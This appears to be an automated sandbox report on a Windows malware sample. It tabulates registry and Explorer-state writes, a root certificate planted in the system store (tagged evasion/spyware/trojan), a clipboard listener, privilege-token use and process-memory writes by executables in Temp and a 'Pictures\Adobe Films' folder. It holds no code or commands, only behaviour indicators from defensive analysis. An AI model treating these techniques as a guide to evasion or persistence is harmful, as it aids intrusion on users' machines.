Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\Instance\ N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "6" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000008e543d9212004170704461746100400009000400efbe8e543d92e55473672e0000008ce10100000001000000000000000000000000000000c97e6b004100700070004400610074006100000016000000 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 9200310000000000e554446810003732424637337e3100007a0009000400efbee5544468e55447682e0000009c310200000008000000000000000000000000000000f18b3d00370032006200660037003300300033002d0035006400630030002d0034003400650039002d0038003700640038002d00360039003800660038003600370037006100630061006200000018000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5000310000000000e554446810004c6f63616c003c0009000400efbe8e543d92e55444682e0000009fe10100000001000000000000000000000000000000f18b3d004c006f00630061006c00000014000000 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "8" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 N/A N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary certificate blob omitted] C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\RunDll32.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif N/A
N/A N/A N/A N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
